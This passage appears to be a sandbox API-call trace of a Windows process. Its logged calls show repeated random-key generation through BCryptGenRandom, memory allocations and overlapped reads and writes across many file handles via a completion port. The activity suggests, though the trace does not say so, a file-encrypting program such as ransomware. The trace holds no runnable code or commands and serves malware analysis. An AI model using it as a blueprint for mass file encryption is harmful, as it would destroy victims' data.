lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.135] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.149] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.149] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.149] free (_Block=0x3e305b8) [0150.149] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.149] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.150] free (_Block=0x1fa91d0) [0150.150] free (_Block=0x1fa2ed8) [0150.150] free (_Block=0x1fa90b8) [0150.150] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0150.150] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.161] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.161] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.161] free (_Block=0x3e305b8) [0150.161] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.161] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.161] free (_Block=0x1fa91d0) [0150.161] free (_Block=0x1fa2ed8) [0150.161] free (_Block=0x1fa90b8) [0150.162] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.184] CloseHandle (hObject=0x308) returned 1 [0150.184] free (_Block=0x3df0008) [0150.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.185] CloseHandle (hObject=0x2a8) returned 1 [0150.186] free (_Block=0x3ef0008) [0150.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.186] CloseHandle (hObject=0x170) returned 1 [0150.186] free (_Block=0x1ff1e60) [0150.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.192] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.193] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.193] free (_Block=0x3e305b8) [0150.193] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.193] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.193] free (_Block=0x1fa91d0) [0150.193] free (_Block=0x1fa2ed8) [0150.193] free (_Block=0x1fa90b8) [0150.193] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.194] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.227] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbbc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.235] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x128e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.261] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.262] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.262] free (_Block=0x3e305b8) [0150.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.262] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.263] free (_Block=0x1fa91d0) [0150.263] free (_Block=0x1fa2ed8) [0150.263] free (_Block=0x1fa90b8) [0150.263] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.277] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.277] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.277] free (_Block=0x3e305b8) [0150.277] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.277] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.277] free (_Block=0x1fa91d0) [0150.278] free (_Block=0x1fa2ed8) [0150.278] free (_Block=0x1fa90b8) [0150.278] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.293] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.293] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.293] free (_Block=0x3e305b8) [0150.293] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.293] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.293] free (_Block=0x1fa91d0) [0150.294] free (_Block=0x1fa2ed8) [0150.294] free (_Block=0x1fa90b8) [0150.294] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.452] CloseHandle (hObject=0x3cc) returned 1 [0150.452] free (_Block=0x3df0008) [0150.452] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.463] CloseHandle (hObject=0x308) returned 1 [0150.464] free (_Block=0x1ff1e60) [0150.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.478] CloseHandle (hObject=0x170) returned 1 [0150.482] free (_Block=0x3d70450) [0150.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.486] CloseHandle (hObject=0x2a8) returned 1 [0150.486] free (_Block=0x3ef0008) [0150.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.488] CloseHandle (hObject=0xec) returned 1 [0150.488] free (_Block=0x3e70008) [0150.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.489] CloseHandle (hObject=0x3cc) returned 1 [0150.489] free (_Block=0x3df0008) [0150.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.494] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.494] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.494] free (_Block=0x3e305b8) [0150.494] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.494] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.494] free (_Block=0x1fa91d0) [0150.495] free (_Block=0x1fa2ed8) [0150.495] free (_Block=0x1fa90b8) [0150.495] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.498] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6fa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.498] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.499] CloseHandle (hObject=0x308) returned 1 [0150.500] free (_Block=0x1ff1e60) [0150.500] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.511] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.511] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.511] free (_Block=0x3e305b8) [0150.511] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.511] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.511] free (_Block=0x1fa91d0) [0150.511] free (_Block=0x1fa2ed8) [0150.511] free (_Block=0x1fa90b8) [0150.512] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.513] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9d70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.514] CloseHandle (hObject=0x308) returned 1 [0150.514] free (_Block=0x3df0008) [0150.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.525] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.525] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.525] free (_Block=0x3e305b8) [0150.525] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.525] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.525] free (_Block=0x1fa91d0) [0150.525] free (_Block=0x1fa2ed8) [0150.525] free (_Block=0x1fa90b8) [0150.525] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.528] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.529] CloseHandle (hObject=0x308) returned 1 [0150.529] free (_Block=0x3df0008) [0150.529] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.549] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.549] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.549] free (_Block=0x3e305b8) [0150.550] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.550] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.550] free (_Block=0x1fa91d0) [0150.550] free (_Block=0x1fa2ed8) [0150.550] free (_Block=0x1fa90b8) [0150.550] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.550] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.552] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xae10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.564] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe17a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.581] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x714e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.583] CloseHandle (hObject=0x308) returned 1 [0150.583] free (_Block=0x3df0008) [0150.583] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.593] 